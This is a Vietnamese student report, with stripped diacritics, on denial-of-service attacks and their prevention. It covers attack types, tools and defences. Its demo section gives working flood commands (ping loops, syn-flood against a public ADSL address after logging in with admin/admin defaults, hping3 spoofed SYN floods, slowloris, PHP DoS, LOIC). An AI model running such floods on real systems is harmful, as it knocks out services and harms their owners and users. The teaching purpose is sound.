Professional Documents
Culture Documents
TI:
N CNG MANG BNG DOS K THUT T V CCH PHNG CHNG
GVHD : HUNH TH SVTH : 1.NGUYN VN CNG MSSV: 0951150005 2. V TN CNG MSSV: 0951150006
U I M L
Bo mt an ninh mng hin nay c t ln hng u vi bt k cng ty no c h thng mng d ln hay nh. Hin nay, cc hacker trong v ngoi nc lun tm cch tn cng v xm nhp h thng ly cc thng tin ni b.Nhng thng tin nhy cm thng nh hng ti sng cn ca cng ty.Chnh v vy, cc nh qun tr mng lun c gng bo v h thng ca mnh tt nht c th v c gng hon thin h thng mnh bt l hng. Tuy nhin, mt kiu tn cng rt c in l tn cng t chi dch v cha bao gi mt i tnh nguy him i vi h thng mng. Hu qu m DoS gy ra khng ch tiu tn nhiu tin bc, v cng sc m cn mt rt nhiu thi gian khc phc. DoS v DDoS vn ang l vn nan gii cha c bin php no chng c hon ton cuc tn cng. Vi yu cu cp thit nh vy, nhm em chn ti Tm hiu k thut tn cng DoS v cch phng chng lm n An Ninh Mng. Mc ch a ra khi lm ti l hiu c cc kiu tn cng v t a ra cch phng chng DoS.
MUC LUC
TI: DOS ATTACK
PHN I: TNG QUAN V TN CNG MNG Trang I. Nhng s kin v cc cuc tn cng mng4 II. Hiu bit v cc cuc tn cng mng.6 III. Nhng nguy c nh hng n an ton mng7 PHN II :TN CNG T CHI DCH VU DOS I . DoS attack l g ? 12 II. Cc k thut tn cng DoS..14 III. Mt s cng c tn cng DoS.23 PHN III :CCH PHNG CHNG DOS I. Nhng bin php i ph DoS27 II. Cng c phng chng DoS31 III . Kim tra thm nhp DoS34 PHN IV :HNG DN & DEMO CCH TN CNG DOS
hnh thc cha c m ha, hay nhng mt khu v cng thiu an ton c cc nh qun l s dng.
S dng tri php ti khon ngi dng v c quyn n cp phn cng Phn mm nh cp Chy m cho cc h thng thit hi Chy m thit hi v d liu tham nhng Sa i d liu c lu tr n cp d liu S dng d liu cho li ch ti chnh hoc hot ng gin ip cng nghip Thc hin cc hnh ng ngn chn ngi dng hp php c thm quyn truy cp vo cc dch v mng v cc ngun lc. Thc hin hnh ng lm cn kit ti nguyn mng v bng thng.
2. Khng c k hoch x l ri ro
H thng my tnh, mng ca doanh nghip lun phi i mt vi nhiu nguy c bo mt, t vic h hng vt l cho n cc trng hp b tn cng t tin tc hay virus u c kh nng gy tn hi cho d liu. Kh nhiu doanh nghip va v nh thiu hn chnh sch phn ng vi vic tht thot d liu hay k hoch khc phc s c. i a s u lng tng v bt u cc hot ng mang tnh ng ph.
6. Mt mt thit b di ng
Rt nhiu doanh nghip, thm ch gn y cn c c mt vi hng ln b tht thot d liu quan trng do mt cp my tnh xch tay, tht lc in thoi di ng hay cc a flash USB lu tr. D liu trong cc thit b ny thng t c m ha hay bo v bng mt khu, rt d dng x l mt khi s hu chng.
7. Li t my ch web
Hin cn kh nhiu doanh nghip khng coi trng vic t website ca mnh ti my ch no, mc bo mt ra sao. Do , website kinh doanh ca doanh nghip s l mi ngon ca cc t tn cng SQL Injection hay botnet.
9. Email cha ng m c
Nhng cuc di bom th rc s lm trn ngp hp th ca bn vi nhng tiu hp dn nh nhng v scandal tnh i, hnh nh nng bng hay cc li mi cho kinh doanh... ch mt c nhp chut sai lm th ngay lp tc my tnh s ti v cc on m c lm tin cho hng lot phn mm c hi i sau xm nhp vo my tnh.
10. Khng v li bo mt
8
Hn 90% cc cuc tn cng vo h thng mng u c gng khai thc cc li bo mt c bit n.Mc d cc bn v li vn thng xuyn c nhng hng sn xut cung cp ngay sau khi li c pht hin nhng mt vi doanh nghip li khng coi trng vic cp nht li thng nht dn n vic cc li bo mt m toang cng cho n nhng cuc tn cng.
Giao thc TCP/IP l im yu trong bo mt v n c thit k nh mt tiu chun m giup cho vic trao i thng tin c d dng . iu lm cho n tr nn s du ng r ng rai nhng cung lm cho n d dng b tn cng v hu ht mi ngi u thn thuc vi cch thc TCP/IP lm vic. Hai giao thc m Cisco thch la chn trong chm giao thc TCP/ IP nhng vn c hu li khng c bo mt la SMTP ( TCP ) va SNMP ( UDP ). in hnh ca k thut tn cng vo hai giao thc ny l IP spoofing, man-in-the-middle v session replay. 12.1.2) Operating System weaknesses: Trong khi tt c cc h iu hnh u c im yu th Linux v Unix c xem nh l t c im yu hn Windows. Thc t, hu ht mi ngi dng cc phin bn ca Windows. 12.1.3) Network equipment weaknesses: Hu ht cc thit b mng nh l servers, switchs, routers u c iu yu trong bo mt. Nhng co mt chnh sch tt cho vic cu h nh v lp t cho cc thit b mng s lm gim i rt nhi u s nh hng ca im yu ny.
Mt vi cng ty s dng a ch tht trn mng internet nh a ch cho hosts v servers. iu ny to nn im yu m cc hacker s d dng khai thc thng tin. S dng giao thc NAT hoc PAT c th gii quyt vn trn. S dng a ch ring ( private address ) cho php nh a ch hosts v servers ma khng cn dng a ch tht trn mng, trong khi a ch tht th c border router nh tuyn ra mng internet. khng phi l bin php ti u. Port trn interface kt ni ra internet phi trng thi open cho php users vo mng internet v ngc li. l l hng trn bc tng la ( firewall ) m hacker c th tn cng vo. Bn c th to ra tnh bo mt cho network bng cch s dng conduits , l kt ni bo mt c bn. Cisco Secure Private Internet Echange ( PIX ) firewall l bin php ti u to ra tnh bo mt tt cho mng. 12.2.4) Unsecured default settings in product: Nhiu sn phm phn cng c cung cp m khng c password hoc l password sn c gip cho nh qun tr d dng cu hnh thit b. N lm cho cng vic d dng hn, nh mt s thit b ch cn cm vo v hot ng. iu ny s gip cho s tn cng mng tr nn d dng. Do , ta cn phi thit lp mt chnh sch cu hnh bo mt trn mi thit b trc khi thit b c lp t vo h thng mng. 12.2.5) Misconfigured Netword Equipment: Li cu hnh thit b l mt l h ng c th khai thc tn cng mng: password yu, khng c chnh sch bo mt hoc khng bo mt user account u l li cu hnh thit b. Phn cng v nhng giao thc chy trn thit b cng to ra l hng bo mt trong mng.Nu bn khng c chnh sch bo mt cho phn cng v nhng giao thc ny th hacker s li dng tn cng mng. Nu bn s dng SNMP c mc nh thit lp th thng tin c th b nh cp mt cch d dng v nhanh chng. Do , hy chc chn l bn lm mt hiu lc ca SNMP hoc l thay i mc nh thit lp SNMP c sn. 12.3) Policy weaknesses:
11
Chnh sch bo mt din t lm th no v u chnh sch bo mt c thc hin. y l iu kin quan trng gip vic bo mt c hiu qu tt nht.
2. Cc mc ch ca tn cng DoS
C gng chim bng thng mng v lm h thng mng b ngp (flood), khi h thng mng s khng c kh nng p ng nhng dch v khc cho ngi dng bnh thng. C gng lm ngt kt ni gia hai my, v ngn chn qu trnh truy cp vo dch v. C gng ngn chn nhng ngi dng c th vo mt dch v no C gng ngn chn cc dch v khng cho ngi khc c kh nng truy cp vo. Khi tn cng DoS xy ra ngi dng c cm gic khi truy cp vo dch v nh b: + Disable Network - Tt mng + Disable Organization - T chc khng hot ng + Financial Loss Ti chnh b mt
12
13
DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x. Hacker s gi cc gi tin vi d liu "Out of Band" n cng 139 ca my tnh ch.( Cng 139 chnh l cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of Band c bt ). Khi my tnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li s c hin th ln vi nn nhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit phn ng vi cc d liu Out Of Band nh th no dn n h thng s b crash .
2. Ping of Death
14
Tn cng Ping of Death (hay PoD) c th lm t lit c mng li da trn l hng ca h thng TCP/IP. Kch thc ti a cho 1 gi d liu l 65,535 bytes. Nu ta gi cc gi tin ln hn nhiu so vi kch thc ti a thng qua lnh ping n my ch th s lm my tnh ch b treo. Nhng gi 1 gi tin ln hn kch thc quy nh l iu tri vi lut ca giao thc TCP/IP,v vy Hacker kho lo gi cc gi tin trn cc on phn mnh. Khi my tnh victim rp cc phn mnh d liu th s nhn thy gi tin qu ln. iu ny s gy ra li trn b m v treo cc thit b. Nhng n nay th hu ht cc thit b c sn xut sau nm 1998 min dch vi loi tn cng ny.
3. Teardrop
15
Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h thng ch u phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh nh h thng ngun, mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi d liu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi tr offset sp xp cc mnh li vi nhau theo th t ng nh ban u . Li dng s h , ta ch cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. H thng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng cho ln nhau qu ln !
4. SYN Attack
SYS
TCP Client
ClientPort 1024-65535
SYN/ACK
TCP Server
80
ACK
ServicePort 1-1023
SYN
?
SYS/ACK
Client SYN
SYN/ACK
Server
Attacker/Agent SYN
Server
SYN/ACK
SYN/ACK
ACK
16
Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch IP ngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr li cc a ch khng c thc v ch i nhn thng tin phn hi t cc a ch IP gi . V y l cc a ch IP khngc thc, nn h thng ch s s ch i v ch v cn a cc "request"ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n b crash hoc boot my tnh .
5. Land Attack
Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch IP khng c thc, hacker s dng chnh a ch IP ca h thng nn nhn. iu ny s to nn mt vng lp v tn gia trong chnh h thng nn nhn ,gia mt bn cn nhn thng tin phn hi cn mt bn th chng bao gi gi thng tin phn hi i c . == > Gy ng p lng ng .
6. Smurf Attack
17
Hnh 2.6 M hnh tn cng Smuft Attack Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuch i (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP packets ny c a ch IP ngun chnh l a ch IP ca nn nhn . Khi cc packets n c a ch broadcast ca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi tr li h thng nn nhn cc gi tin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khng l cc gi tin ny v nhanh chng b ngng hot ng, crash hoc reboot. Nh vy, ch cn gi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch i lng gi tin ICMP packets ny ln gp bi . T l khuch i ph thuc vo s mng tnh c trong mng khuch i . Nhim v ca cc hacker l c chim c cng nhiu h thng mng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua ch lc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tin hnh Smurf Attack trn cc h thng cn tn cng . == >nh tng lc .
7. Fraggle Attack
18
Tng t nh Smurt attack nhng thay v dng gi tin ICMP ECHO REQUEST th s dng cch tn cng ny s dng gi tin UDP ECHO gi n mc tiu. Nhng Flaggle Attack nguy him hn Smurt attack rt nhiu.V Attacker tn cng bng mt gi tin ECHO REQUEST vi a ch bn nhn l mt a ch broadcast, ton b h thng thuc a ch ny lp tc gi gi tin REPLY n port echo ca victim, sau t victim mt gi tin ECHO REPLY li gi tr v a ch broadcast, v qu trnh c th tip din.
8. UDP Flooding
19
Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho h thng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo a ch IP ca cc gi tin l a ch loopback (127.0.0.1 ) , ri gi gi tin ny n h thng ca nn nhn trn cng UDP echo( 7 ). H thng ca nn nhn s tr li li cc messages do 127.0.0.1( chnh n) gi n , kt qu l n s i vng mt vng lp v tn. Tuy nhin, c nhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch IP ca mt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nn nhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s b y.
9. Tn cng DNS
Hacker c th i mt li vo trn Domain Name Server ca h thng nn nhn ri cho ch n mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xm nhp thnh a ch IP, lp tc DNS ( b hacker thay i cache tm thi ) s i thnh a ch IP m hacker cho ch n . Kt qu l thay v phi vo trang Web mun vo th cc nn nhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v tht hu hiu !.
Hnh 2.10 M hnh tn cng DDos DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thm nhp vo cc mng my tnh c bo mt km, sau ci ln cc h
20
thng ny chng trnh DDoS server. By gi cc hackers s hn nhau n thi gian nh s dng DDoS client kt ni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n h thng nn nhn .
21
22
1. DoSHTTP + Sprut:
y l 2 phn mm lm Flood Website mc nh v n thc hin bng cch gi cc gi tin Request n port 80 ca website. DoSHTTP l mt phn mm s dng d dng, mnh m tn cng trn ngp HTTP nhm mc ch kim th trn Windows. DoSHTTP bao gm xc nhn URL, chuyn hng HTTP v gim st hiu sut.Cng c DoSHTTP c th gip cc chuyn gia CNTT th nghim hiu nng my ch web v nh gi bo mt.
23
2. LOIC
LOIC l ng dng tn cng t chi dch v, c vit bng C#. Loic thc hin tn cng t chi dch v tn cng (hoc khi c s dng bi nhiu c nhn, s l mt cuc tn cng DDoS). Trn mt trang web mc tiu lm ngp cc my ch vi cc gi tin TCP hoc UDP vi nh lm gin on dch v ca mt my ch c th. Cng c LOIC l mt botnet tnh nguyn kt ni n mt my ch t xa m ch o cc cuc tn cng. Hin nay, c 40.000 ngi kt ni vi botnet.
24
3. UDP Flood
UDPFlood l mt chng trnh gi cc gi tin UDP. N gi ra ngoi nhng gi tin UDP ti mt a ch IP v port khng c nh. Gi tin c kh nng l mt on m vn bn hay mt s lng d liu c sinh ngu nhin hay t mt file c s dng kim tra kh nng p ng ca server.
25
4. rDoS
Phn mm chy trn nn TCP v phng php tn cng l lm ngp lt SYN. Ch cn nhp IP ca Vitim v Port mun tn cng th chng trnh s t ng chy.
Lu :Khi s dng th phi cn thn v thot ra ng cch v nu khng my
tnh ca mnh s t ng tn cng DoS ti victim ch nh khi mnh bt my ln,d cha lm 1 thao tc no. kim tra th chng ta s dng WireShark s thy r vn .
26
27
28
3.3 Lm lch hng tn cng H thng thit lp vi gii hn bo mt, cng bit nh l honeypot, hot ng cm d i vi k tn cng. Phc v c ngha l ginh thng tin t k tn cng bng cch lu tr mt bn ghi cc hot ng, hc kiu tn cng v cng c phn mm k tn cng s dng. Dng phng th chiu su tip cn vi IPSec ti im mng khc nhau chuyn hng ng ng lung DoS n vi honeypot. Honeypot l mt h thng ti nguyn thng tin c xy dng vi mc ch gi dng nh la nhng k s dng v xm nhp khng hp php, thu ht s ch ca chng, ngn khng cho chng tip xc vi h thng tht. 3.4 Lm du cuc tn cng Cn bng ti: o Nh cung cp tng bng thng trn kt ni quan trng ngn nga v gim xung tn cng. o Nhn bn my ch c th cung cp thm bo v an ton. o Cn bng ti cho mi server trn cu trc nhiu server c th ci tin hiu sut bnh thng nh l gim nh hng ca cuc tn cng DoS. Hot ng iu chnh: o Thit lp cch thc router truy cp mt server vi iu chnh logic lu lng i vo ti mc s an ton server x l. o B x l c th ngn nga trn ngp thit hi ti server. o B x l ny c th m rng iu chnh lung tn cng DoS i lp lu lng hp php ca ngi s dng cho kt qu tt hn.
29
3.5 Php l Phn tch router, firewall, v IDS logs nhn bit ngun ca lu lng DoS. Mc d k tn cng thng thng gi mo a ch ngun, du vt IP tr li vi tr gip ngay lp tc ca ISP v thc thi php lut cc c quan c th cho php bt cc th phm. Phn tch mu lu lng: D liu c th c phn tch-sau tn cng- tm kim c im ring bit trong lu lng tn cng. Mu lu lng tn cng DoS c th gip ngi qun tr mng pht trin k thut lc ngn nga i vo hoc i ra mng Dng nhng c im, d liu c th c dng cp nhp cn bng ti v iu chnh bin php i ph.
4. Bo v DoS
4.1 Mc ISP Nhiu ISP n gin kha tt c yu cu trong thi gian tn cng DoS, t chi lu lng hp php t truy cp dch v. ISP a ra m my DoS bo v ng lin kt internet v vy h khng th bo ha bi cuc tn cng. Lu lng tn cng c chuyn hng ti ISP trong cuc tn cng lc v gi tr li. Qun tr mng c th yu cu ISP kha ngun IP tc ng v di chuyn trang web ti IP khc sau khi thc hin lan truyn DNS.
(Cu hnh kch hot ngt TCP trn phn mm IOS Cisco)
30
4.2 H thng bo v IntelliGuard IntelliGuard DPS tr gip lm du tn cng DoS c thit k tp trung vt qua lu lng hp php hn l b qu lu lng tn cng.Cp bc hc bo v chin lc nhn bit v tr truy cp bng cch u tin cho khch hng v xp hng truy cp ca h.Qun l lu lng a cp cu hnh gii hn lu lng v m bo cho vic qun l lu lng cho mi thnh phn ca mng.
II.CNG CU BO V DOS
1. NetFlow Analyzer
NetFlow Analyzer, mt cng c phn tch lu lng y , thc y cng ngh phn tch lu lng cung cp kh nng hin th thi gian thc v hiu sut bng thng mng. Ch yu NetFlow Analyzerl mt cng c gim st bng thng, c ti u ha hng ngn mng li trn ton th gii bng cch a ra ci nhn ton din v bng thng mng v cc mu lu lng truy cp. NetFlow Analyzer l mt gii php thng nht thu thp, phn tch v bo co v bng thng mng ca bn ang c s dng v ngi s dng. NetFlow Analyzer l i tc tin cy ti u ha vic s dng bng thng trn ton th gii ngoi ra n thc hin gim nh mng v phn tch lu lng mng.
31
2. Mt s cng c khc
D-Guard Anti-DDoS Firewall D-Guard Anti-DDoS Firewall cung cp ng tin cy nht v nhanh nht bo v DDoS cho cc doanh nghip trc tuyn, v cc dch v phng tin truyn thng, thit yu h tng cng cng v cung cp dch v Internet. L mt chuyn nghip Anti-DDoS Firewall, D-Guard c th bo v chng li hu ht cc cuc tn cng cc loi, bao gm c DoS / DDoS, Super DDoS, DrDoS, Fragment tn cng, tn cng SYN l lt, l lt tn cng IP, UDP, UDP t bin, ngu nhin UDP Flooding tn cng, ICMP, IGMP tn cng, ARP Spoofing, HTTP Proxy tn cng, CC Flooding tn cng, CC Proxy tn cng,
32
D-Guard Anti-DDoS Firewall cung cp mt cp trn cch tip cn c bn gim nh cc cuc tn cng DDoS, vi mt thit k tp trung vo giao thng qua hp php ch khng phi l loi b giao thng tn cng, x l cc cuc tn cng kch bn c th suy thoi ti t nht m khng cn hiu sut.
FortGuard Firewall FortGuard Firewall - mt gii php gip ngi dng chng li cc cuc tn cng DDoS vi chnh xc v hiu sut cao nht... FortGuard Firewall l mt phn mm tng la Anti-DDoS nh nhng mnh m vi Intrusion Prevention System sn c.N c th bo v my tnh ca bn chng li cc cuc tn cng DDoS chnh xc nht vi hiu sut cao nht. FortGuard Firewall c th chng li SYN, TCP Flooding v cc loi tn cng DDoS khc v kh nng thy c cc gi tn cng thi gian thc. Chng trnh cho php bn v hiu ha/ kch hot truy cp qua proxy vo tng ng dng v c th ngn chn hn 2000 kiu hot ng ca hacker.
33
1. Kim tra web server dng cng c t ng nh l Web Application Stress(WAS) v Jmeter cho kh nng chu ti, hiu sut server, kha, v kh nng m rng pht sinh. 2. Qut h thng dng cng c t ng nh NMAP, GFI LANGuard, v Nessus khm ph bt k h thng d b tn cng DoS. 3. Trn ngp mc tiu vi yu cu gi tin kt ni dng cng c Trin00, Tribe Flood, v TFN2K. 4. Tn cng trn ngp cng lm y cng v tng s dng duy tr tt c yu cu kt ni lm tc nghn cng.Dng cng c Mutilate and Pepsi5 t ng tn cng trn ngp cng. 5. Dng cng c Mail Bomber, Attache Bomber, v Advanced Mail Bomber gi s lng mail ln cho mail server mc tiu. 6. in vo cc mu ni dung ty v ko di lm trn ngp trang web.
35
Nu nh bn mun m cng mt lc 20 ca s Window ping th ta c th kt hp vi cu lnh For nh sau For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 nh vy chng trnh s m ra cng mt lc 20 ca s window ping lin tc n IP 192.168.1.254
36
Kiu tn cng ny s gi lin tc gi ping request ti victim v victim x l bng cch gi icmp relay ti my attacker.
(Bt wireshark khi b tn cng trn ngp ICMP bng Ping of Death)
Kt lun: Kiu tn cng ICMP l kiu tn cng c in nht, rt d thc hin. Cc router cu hnh yu rt d b tn cng v treo nhanh chng.
37
38
V d trong 1 on file scan_adsl.txt c ni dung nh bn di ngha l IP 118.68.226.7 ang m port 80 Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7) Host is up (0.037s latency). PORT STATE SERVICE 80/tcp open http Ta vo trnh duyt web kim tra IP trang web ca IP ny v th nhp vo username: admin v password admin mc nh
Ta s thc hin syn flood attack vo port 80 trn router ADSL ny b ng cng c syn-flood-alpha1.tar.gz. Ta thc hin qu trnh ci t ging nh bn di.
39
root@bt:~/Desktop# ls scan_adsl.txt syn-flood-alpha1.tar.gz root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz syn-flood/ syn-flood/Makefile syn-flood/gpl.txt syn-flood/syn-flood.cpp root@bt:~/Desktop# cd syn-flood root@bt:~/Desktop/syn-flood# ls gpl.txt Makefile syn-flood.cpp root@bt:~/Desktop/syn-flood# make g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp g++ -o syn-flood syn-flood.o Ta thc hin qu trnh tn cng bng cu lnh bn di gi ra 100000 gi tin syn root@bt:~/Desktop/syn-flood# ./syn-flood Usage: ./syn-flood --IPIP --port PORT [verbose] -h --help Display this usage information. -i --IP Destination IP address. -p --port Destination port. -n --num Number of packets to send. -v --verbose Print verbose messages. root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000 Sent 1000000 packets. Ta s dng chng trnh Wireshark phn tch qu trnh hot ng ca cng c ny th thy chng trnh gi ra 100000 gi tin TCP SYN n victim v router adsl vi IP 118.68.226.7 vi cc source IP l cc IP gi khc nhau.
40
-a gi dng IP 192.168.1.254 -p port 445 -S thc hin Syn Flood attack -i --interval wait (uX for X microseconds, for example -i u1000) --fast alias for -i u10000 (10 packets for second) --faster alias for -i u1000 (100 packets for second) --flood sent packets as fast as possible. Don't show replies. root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 c 100000 -c ngha l count, ta s gi 100000 n victim Ti my Victim nu nh b SYN Flood ta kim tra trng thi kt ni bng lnh netstat -ano th thy xut hin rt nhiu kt ni SYN
42
4. PHP DoS
Ta s thc hin upload source PHP DoS ln mt Web Server, v s dng server ny tn cng mt server khc. u tin ta thc hin vic upload source vo chng trnh PHP DoS vo Web Server
43
Ta s dng trnh duyt web kt vo trang PHP DoS hoc s dng trong Folder km theov thc hin tn cng vo victim no
Sau khi attack xong th chng trnh s thng k li cho ta s lng gi tin.
45
Thc hin DoS vo mt victim bng cu lnh perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5, ta nn xem thm trong phn help ca chng trnh bit thm ngha ca cc bin
46
47
48
50
Tt phn mm
51
52
7. LOIC
Dng cng c LOIC tn cng website http://abc.com bng nhiu kiu: TCP, UDP, HTTP v chnh tc tn cng nhanh hay chm.
c bit, LOIC dng kt ni cc tnh nguyn vin dng botnet tn cng mc tiu.
=>Kt Lun
Da vo kt qu thc nghim v kt qu ca m hnh phng chng.Ta phn no hiu hn v vic th no l tn cng t chi dch v (DoS).Qua chng minh cho ta thy tnh ph hoi ca cc cuc tn cng DoS gy hu qu nh th no vi h thng, n c th lm cho h thng b nghn v nu l mt cuc tn cng ln th c th lm h thng reboot v nu h thng lin quan n ti chnh th c th nh hng khng nh n ti chnh ca cng ty cha h thng .
53
54